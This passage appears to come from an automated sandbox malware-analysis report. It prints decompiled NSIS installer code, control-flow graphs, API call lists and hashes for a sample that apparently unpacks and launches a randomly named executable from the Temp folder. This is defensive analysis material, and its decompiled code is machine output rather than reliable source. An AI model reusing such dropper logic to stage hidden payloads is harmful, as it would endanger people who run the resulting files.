						if(_t69 == 0xffffffff) {
							L14:
							E00405E22(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

























                                  0x00403bbc
                                  0x00403bc5
                                  0x00403bcc
                                  0x00403bce
                                  0x00403be2
                                  0x00403bf4
                                  0x00403bfd
                                  0x00403c06
                                  0x00403c0d
                                  0x00403c12
                                  0x00403c19
                                  0x00403c2c
                                  0x00403c2c
                                  0x00403c37
                                  0x00403bd0
                                  0x00403bd0
                                  0x00403bdb
                                  0x00403bdb
                                  0x00403c3c
                                  0x00403c46
                                  0x00403c4f
                                  0x00403c54
                                  0x00403c65
                                  0x00403cf7
                                  0x00403cff
                                  0x00403d08
                                  0x00403d08
                                  0x00403d1e
                                  0x00403d24
                                  0x00403d32
                                  0x00403db3
                                  0x00403dbb
                                  0x00403dc5
                                  0x00403dca
                                  0x00403dd0
                                  0x00403e5a
                                  0x00403e5f
                                  0x00403e61
                                  0x00403e7d
                                  0x00000000
                                  0x00403e7d
                                  0x00403e63
                                  0x00403e69
                                  0x00403e71
                                  0x00403e71
                                  0x00000000
                                  0x00403e69
                                  0x00403dde
                                  0x00403de9
                                  0x00403dee
                                  0x00403df0
                                  0x00403df7
                                  0x00403df7
                                  0x00403e02
                                  0x00403e0a
                                  0x00403e0c
                                  0x00403e0e
                                  0x00403e17
                                  0x00403e1a
                                  0x00403e20
                                  0x00403e20
                                  0x00403e3f
                                  0x00403e50
                                  0x00000000
                                  0x00403e55
                                  0x00403dbd
                                  0x00403dbf
                                  0x00000000
                                  0x00403d34
                                  0x00403d34
                                  0x00403d40
                                  0x00403d4a
                                  0x00403d50
                                  0x00403d55
                                  0x00403d64
                                  0x00403e82
                                  0x00403e82
                                  0x00000000
                                  0x00403e82
                                  0x00403d73
                                  0x00403dae
                                  0x00000000
                                  0x00403dae
                                  0x00403c6b
                                  0x00403c6b
                                  0x00403c6e
                                  0x00403c70
                                  0x00000000
                                  0x00000000
                                  0x00403c7e
                                  0x00403c90
                                  0x00403c95
                                  0x00403c9e
                                  0x00000000
                                  0x00000000
                                  0x00403ca4
                                  0x00403ca6
                                  0x00403cb3
                                  0x00403cb3
                                  0x00403cbc
                                  0x00403cc2
                                  0x00403cea
                                  0x00403cf2
                                  0x00000000
                                  0x00403cd4
                                  0x00403cd5
                                  0x00403cde
                                  0x00403ce4
                                  0x00403ce5
                                  0x00000000
                                  0x00403ce5
                                  0x00403ce0
                                  0x00403ce2
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403ce2
                                  0x00403cc2

                                  APIs
                                    • Part of subcall function 004068D4: GetModuleHandleA.KERNEL32(?,00000020,?,00403607,0000000B), ref: 004068E6
                                    • Part of subcall function 004068D4: GetProcAddress.KERNEL32(00000000,?), ref: 00406901
                                  • GetUserDefaultUILanguage.KERNELBASE(00000002,7620FAA0,C:\Users\user\AppData\Local\Temp\,?,00000000,?), ref: 00403BD0
                                    • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                  • lstrcatW.KERNEL32(1033,00423708), ref: 00403C37
                                  • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,?,?,?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000,00000002,7620FAA0), ref: 00403CB7
                                  • lstrcmpiW.KERNEL32(?,.exe,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,?,?,?,C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,00000000,C:\Users\user\AppData\Local\Temp,1033,00423708,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423708,00000000), ref: 00403CCA
                                  • GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj,?,00000000,?), ref: 00403CD5
                                  • LoadImageW.USER32 ref: 00403D1E
                                  • RegisterClassW.USER32 ref: 00403D5B
                                  • SystemParametersInfoW.USER32 ref: 00403D73
                                  • CreateWindowExW.USER32 ref: 00403DA8
                                  • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403DDE
                                  • GetClassInfoW.USER32 ref: 00403E0A
                                  • GetClassInfoW.USER32 ref: 00403E17
                                  • RegisterClassW.USER32 ref: 00403E20
                                  • DialogBoxParamW.USER32 ref: 00403E3F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
                                  • String ID: .DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe C:\Users\user\AppData\Local\Temp\sxlvpqj$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                  • API String ID: 606308-1548620822
                                  • Opcode ID: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
                                  • Instruction ID: f8e28dda484975e23f2397f6e39507faffe4a9094113ace64084d81fe028ea3a
                                  • Opcode Fuzzy Hash: 73edebf74719983ef77143eb6301a5e89110d11547243c9355ecf98ec76e07f3
                                  • Instruction Fuzzy Hash: B761D570244200BBD720AF66AD45F2B3A6CEB84B49F40453FFD41B62E1DB795912CA7D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040307D Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 181memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 321 40307d-4030cb GetTickCount GetModuleFileNameW call 405ff7 324 4030d7-403105 call 406507 call 405e22 call 406507 GetFileSize 321->324 325 4030cd-4030d2 321->325 333 4031f0-4031fe call 403019 324->333 334 40310b 324->334 326 4032ad-4032b1 325->326 340 403200-403203 333->340 341 403253-403258 333->341 336 403110-403127 334->336 338 403129 336->338 339 40312b-403134 call 403499 336->339 338->339 347 40325a-403262 call 403019 339->347 348 40313a-403141 339->348 343 403205-40321d call 4034af call 403499 340->343 344 403227-403251 GlobalAlloc call 4034af call 4032b4 340->344 341->326 343->341 369 40321f-403225 343->369 344->341 367 403264-403275 344->367 347->341 352 403143-403157 call 405fb2 348->352 353 4031bd-4031c1 348->353 358 4031cb-4031d1 352->358 372 403159-403160 352->372 357 4031c3-4031ca call 403019 353->357 353->358 357->358 364 4031e0-4031e8 358->364 365 4031d3-4031dd call 4069c1 358->365 364->336 368 4031ee 364->368 365->364 374 403277 367->374 375 40327d-403282 367->375 368->333 369->341 369->344 372->358 373 403162-403169 372->373 373->358 377 40316b-403172 373->377 374->375 378 403283-403289 375->378 377->358 379 403174-40317b 377->379 378->378 380 40328b-4032a6 SetFilePointer call 405fb2 378->380 379->358 381 40317d-40319d 379->381 384 4032ab 380->384 381->341 383 4031a3-4031a7 381->383 385 4031a9-4031ad 383->385 386 4031af-4031b7 383->386 384->326 385->368 385->386 386->358 387 4031b9-4031bb 386->387 387->358
                                  C-Code - Quality: 78%
                                  			E0040307D(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				long _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				signed int _t87;
				void* _t89;
				long _t90;
				long _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\hardz\\Desktop\\4505682666.exe";
				 *0x42a22c = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\hardz\\Desktop\\4505682666.exe", 0x400);
				_t89 = E00405FF7(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				E00406507(0x436800, _t91);
				E00406507(0x439000, E00405E22(0x436800));
				_t50 = GetFileSize(_t89, 0);
				 *0x420ec4 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00403019(1);
					if( *0x42a234 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t34 =  &_v24; // 0x403847
						_t53 = GlobalAlloc(0x40,  *_t34); // executed
						_t94 = _t53;
						E004034AF( *0x42a234 + 0x1c);
						_t35 =  &_v24; // 0x403847
						_push( *_t35);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004032B4(); // executed
						if(_t57 == _v24) {
							 *0x42a230 = _t94;
							 *0x42a238 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42a23c =  *0x42a23c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405FB2(0x42a240, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004034AF( *0x414eb8);
					if(E00403499( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42a234) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E00403499(0x40ceb8, _t90) == 0) {
							E00403019(1);
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42a234 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00403019(0);
							}
							goto L20;
						}
						E00405FB2( &_v44, 0x40ceb8, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							_t87 =  *0x414eb8; // 0x19400
							 *0x42a2c0 =  *0x42a2c0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42a234 = _t87;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x420ec4) {
							_v12 = E004069C1(_v12, 0x40ceb8, _t90);
						}
						 *0x414eb8 =  *0x414eb8 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 != 0);
					_t82 = 0;
					goto L24;
				}
			}





























                                  0x00403085
                                  0x00403088
                                  0x0040308b
                                  0x0040308e
                                  0x00403094
                                  0x004030a5
                                  0x004030aa
                                  0x004030bd
                                  0x004030c2
                                  0x004030c5
                                  0x004030cb
                                  0x00000000
                                  0x004030cd
                                  0x004030de
                                  0x004030ef
                                  0x004030f6
                                  0x004030fe
                                  0x00403103
                                  0x00403105
                                  0x004031f0
                                  0x004031f2
                                  0x004031fe
                                  0x00000000
                                  0x00000000
                                  0x00403203
                                  0x00403227
                                  0x00403227
                                  0x0040322c
                                  0x00403232
                                  0x0040323d
                                  0x00403242
                                  0x00403242
                                  0x00403245
                                  0x00403246
                                  0x00403247
                                  0x00403249
                                  0x00403251
                                  0x00403268
                                  0x00403270
                                  0x00403275
                                  0x00403277
                                  0x00403277
                                  0x0040327f
                                  0x0040327f
                                  0x00403282
                                  0x00403283
                                  0x00403283
                                  0x00403286
                                  0x00403288
                                  0x00403288
                                  0x00403292
                                  0x00403298
                                  0x004032a6
                                  0x00000000
                                  0x004032ab
                                  0x00000000
                                  0x00403251
                                  0x0040320b
                                  0x0040321d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040310b
                                  0x00403110
                                  0x00403115
                                  0x00403119
                                  0x00403120
                                  0x00403127
                                  0x00403129
                                  0x00403129
                                  0x00403134
                                  0x0040325c
                                  0x00403253
                                  0x00000000
                                  0x00403253
                                  0x00403141
                                  0x004031c1
                                  0x004031c5
                                  0x004031ca
                                  0x00000000
                                  0x004031c1
                                  0x0040314a
                                  0x0040314f
                                  0x00403157
                                  0x0040317d
                                  0x00403183
                                  0x0040318c
                                  0x00403192
                                  0x00403197
                                  0x0040319d
                                  0x00000000
                                  0x00000000
                                  0x004031a7
                                  0x004031af
                                  0x004031b2
                                  0x004031b7
                                  0x004031b9
                                  0x004031b9
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004031a7
                                  0x004031cb
                                  0x004031d1
                                  0x004031dd
                                  0x004031dd
                                  0x004031e0
                                  0x004031e6
                                  0x004031e6
                                  0x004031ee
                                  0x00000000
                                  0x004031ee

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 0040308E
                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\4505682666.exe,00000400,?,?,?,?,?,00403847,?), ref: 004030AA
                                    • Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\4505682666.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
                                    • Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D
                                  • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\Desktop\4505682666.exe,C:\Users\user\Desktop\4505682666.exe,80000000,00000003,?,?,?,?,?,00403847), ref: 004030F6
                                  • GlobalAlloc.KERNELBASE(00000040,G8@,?,?,?,?,?,00403847,?), ref: 0040322C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\4505682666.exe$Error launching installer$G8@$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                  • API String ID: 2803837635-1802309480
                                  • Opcode ID: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                  • Instruction ID: 1a01736021049f1647ec9a5272654600d533d4cd09788acd7f842f4bfc25432a
                                  • Opcode Fuzzy Hash: 14db73aed8e8128a5e37732223ed1b608fd8b3b813a997d0dcc0c08c2bc17799
                                  • Instruction Fuzzy Hash: 06518371901205AFDB209F65DD82B9E7EACEB09756F10807BF901B62D1C77C8F418A6D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004032B4 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 155COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 452 4032b4-4032cb 453 4032d4-4032dc 452->453 454 4032cd 452->454 455 4032e3-4032e8 453->455 456 4032de 453->456 454->453 457 4032f8-403305 call 403499 455->457 458 4032ea-4032f3 call 4034af 455->458 456->455 462 403450 457->462 463 40330b-40330f 457->463 458->457 464 403452-403453 462->464 465 403315-403335 GetTickCount call 406a2f 463->465 466 403439-40343b 463->466 467 403492-403496 464->467 478 40348f 465->478 480 40333b-403343 465->480 468 403484-403488 466->468 469 40343d-403440 466->469 471 403455-40345b 468->471 472 40348a 468->472 473 403442 469->473 474 403445-40344e call 403499 469->474 476 403460-40346e call 403499 471->476 477 40345d 471->477 472->478 473->474 474->462 485 40348c 474->485 476->462 489 403470-40347c call 4060a9 476->489 477->476 478->467 483 403345 480->483 484 403348-403356 call 403499 480->484 483->484 484->462 490 40335c-403365 484->490 485->478 495 403435-403437 489->495 496 40347e-403481 489->496 492 40336b-403388 call 406a4f 490->492 498 403431-403433 492->498 499 40338e-4033a5 GetTickCount 492->499 495->464 496->468 498->464 500 4033f0-4033f2 499->500 501 4033a7-4033af 499->501 504 4033f4-4033f8 500->504 505 403425-403429 500->505 502 4033b1-4033b5 501->502 503 4033b7-4033ed MulDiv wsprintfW call 405569 501->503 502->500 502->503 503->500 508 4033fa-4033ff call 4060a9 504->508 509 40340d-403413 504->509 505->480 506 40342f 505->506 506->478 513 403404-403406 508->513 511 403419-40341d 509->511 511->492 514 403423 511->514 513->495 515 403408-40340b 513->515 514->478 515->511
                                  C-Code - Quality: 94%
                                  			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
				signed int _v8;
				int _v12;
				long _v16;
				intOrPtr _v20;
				short _v148;
				void* _t59;
				intOrPtr _t69;
				long _t70;
				void* _t71;
				intOrPtr _t81;
				intOrPtr _t86;
				long _t89;
				signed int _t90;
				int _t91;
				int _t92;
				intOrPtr _t93;
				void* _t94;
				void* _t95;

				_t90 = _a16;
				_t86 = _a12;
				_v12 = _t90;
				if(_t86 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_t81 = _t86;
				if(_t86 == 0) {
					_t81 = 0x418ec0;
				}
				_t56 = _a4;
				if(_a4 >= 0) {
					E004034AF( *0x42a278 + _t56);
				}
				if(E00403499( &_a16, 4) == 0) {
					L33:
					_push(0xfffffffd);
					goto L34;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t86 == 0) {
							while(_a16 > 0) {
								_t91 = _v12;
								if(_a16 < _t91) {
									_t91 = _a16;
								}
								if(E00403499(0x414ec0, _t91) == 0) {
									goto L33;
								} else {
									if(E004060A9(_a8, 0x414ec0, _t91) == 0) {
										L28:
										_push(0xfffffffe);
										L34:
										_pop(_t59);
										return _t59;
									}
									_v8 = _v8 + _t91;
									_a16 = _a16 - _t91;
									continue;
								}
							}
							L43:
							return _v8;
						}
						if(_a16 < _t90) {
							_t90 = _a16;
						}
						if(E00403499(_t86, _t90) != 0) {
							_v8 = _t90;
							goto L43;
						} else {
							goto L33;
						}
					}
					_v16 = GetTickCount();
					E00406A2F(0x40ce30);
					_t13 =  &_a16;
					 *_t13 = _a16 & 0x7fffffff;
					_a4 = _a16;
					if( *_t13 <= 0) {
						goto L43;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t92 = 0x4000;
						if(_a16 < 0x4000) {
							_t92 = _a16;
						}
						if(E00403499(0x414ec0, _t92) == 0) {
							goto L33;
						}
						_a16 = _a16 - _t92;
						 *0x40ce48 = 0x414ec0;
						 *0x40ce4c = _t92;
						while(1) {
							 *0x40ce50 = _t81;
							 *0x40ce54 = _v12; // executed
							_t69 = E00406A4F(0x40ce30); // executed
							_v20 = _t69;
							if(_t69 < 0) {
								break;
							}
							_t93 =  *0x40ce50; // 0x418ec0
							_t94 = _t93 - _t81;
							_t70 = GetTickCount();
							_t89 = _t70;
							if(( *0x42a2d4 & 0x00000001) != 0 && (_t70 - _v16 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v148, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t95 = _t95 + 0xc;
								E00405569(0,  &_v148);
								_v16 = _t89;
							}
							if(_t94 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L43;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t94;
									_v12 = _v12 - _t94;
									_t81 =  *0x40ce50; // 0x418ec0
									L23:
									if(_v20 != 1) {
										continue;
									}
									goto L43;
								}
								_t71 = E004060A9(_a8, _t81, _t94); // executed
								if(_t71 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t94;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L34;
					}
					goto L33;
				}
			}





















                                  0x004032bf
                                  0x004032c3
                                  0x004032c6
                                  0x004032cb
                                  0x004032cd
                                  0x004032cd
                                  0x004032d4
                                  0x004032d8
                                  0x004032dc
                                  0x004032de
                                  0x004032de
                                  0x004032e3
                                  0x004032e8
                                  0x004032f3
                                  0x004032f3
                                  0x00403305
                                  0x00403450
                                  0x00403450
                                  0x00000000
                                  0x0040330b
                                  0x0040330f
                                  0x0040343b
                                  0x00403484
                                  0x00403455
                                  0x0040345b
                                  0x0040345d
                                  0x0040345d
                                  0x0040346e
                                  0x00000000
                                  0x00403470
                                  0x0040347c
                                  0x00403435
                                  0x00403435
                                  0x00403452
                                  0x00403452
                                  0x00000000
                                  0x00403452
                                  0x0040347e
                                  0x00403481
                                  0x00000000
                                  0x00403481
                                  0x0040346e
                                  0x0040348f
                                  0x00000000
                                  0x0040348f
                                  0x00403440
                                  0x00403442
                                  0x00403442
                                  0x0040344e
                                  0x0040348c
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040344e
                                  0x00403320
                                  0x00403323
                                  0x00403328
                                  0x00403328
                                  0x00403332
                                  0x00403335
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040333b
                                  0x0040333b
                                  0x0040333b
                                  0x00403343
                                  0x00403345
                                  0x00403345
                                  0x00403356
                                  0x00000000
                                  0x00000000
                                  0x0040335c
                                  0x0040335f
                                  0x00403365
                                  0x0040336b
                                  0x00403373
                                  0x00403379
                                  0x0040337e
                                  0x00403385
                                  0x00403388
                                  0x00000000
                                  0x00000000
                                  0x0040338e
                                  0x00403394
                                  0x00403396
                                  0x004033a3
                                  0x004033a5
                                  0x004033d6
                                  0x004033dc
                                  0x004033e8
                                  0x004033ed
                                  0x004033ed
                                  0x004033f2
                                  0x00403429
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004033f4
                                  0x004033f8
                                  0x0040340d
                                  0x00403410
                                  0x00403413
                                  0x00403419
                                  0x0040341d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403423
                                  0x004033ff
                                  0x00403406
                                  0x00000000
                                  0x00000000
                                  0x00403408
                                  0x00000000
                                  0x00403408
                                  0x004033f2
                                  0x00403431
                                  0x00000000
                                  0x00403431
                                  0x00000000
                                  0x0040333b

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID: CountTick$wsprintf
                                  • String ID: ... %d%%$G8@$MZx
                                  • API String ID: 551687249-258887703
                                  • Opcode ID: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                  • Instruction ID: 27b76012fb03590ae9ad79c5aacab076c27bed8bf8d9d3eaec1048eb1f993e7f
                                  • Opcode Fuzzy Hash: 0ab2bdc8f4aac4b64a671381cd6011d12ac280905d32863242ebb6a28b8b2df1
                                  • Instruction Fuzzy Hash: 7F519D71900219DBCB11DF65DA446AF7FA8AB40766F14417FFD00BB2C1D7788E408BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040176F Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 145stringtimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 516 40176f-401794 call 402da6 call 405e4d 521 401796-40179c call 406507 516->521 522 40179e-4017b0 call 406507 call 405dd6 lstrcatW 516->522 527 4017b5-4017b6 call 40678e 521->527 522->527 531 4017bb-4017bf 527->531 532 4017c1-4017cb call 40683d 531->532 533 4017f2-4017f5 531->533 540 4017dd-4017ef 532->540 541 4017cd-4017db CompareFileTime 532->541 534 4017f7-4017f8 call 405fd2 533->534 535 4017fd-401819 call 405ff7 533->535 534->535 543 40181b-40181e 535->543 544 40188d-4018b6 call 405569 call 4032b4 535->544 540->533 541->540 545 401820-40185e call 406507 * 2 call 406544 call 406507 call 405b67 543->545 546 40186f-401879 call 405569 543->546 556 4018b8-4018bc 544->556 557 4018be-4018ca SetFileTime 544->557 545->531 578 401864-401865 545->578 558 401882-401888 546->558 556->557 560 4018d0-4018db FindCloseChangeNotification 556->560 557->560 561 402c33 558->561 563 4018e1-4018e4 560->563 564 402c2a-402c2d 560->564 565 402c35-402c39 561->565 568 4018e6-4018f7 call 406544 lstrcatW 563->568 569 4018f9-4018fc call 406544 563->569 564->561 575 401901-4023a2 call 405b67 568->575 569->575 575->564 575->565 578->558 580 401867-401868 578->580 580->546
                                  C-Code - Quality: 75%
                                  			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E4D( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"C:\\Users\\hardz\\AppData\\Local";
				if(_t35 == 0) {
					lstrcatW(E00405DD6(E00406507(_t81, 0x436000)), ??);
				} else {
					E00406507();
				}
				E0040678E(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E0040683D(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
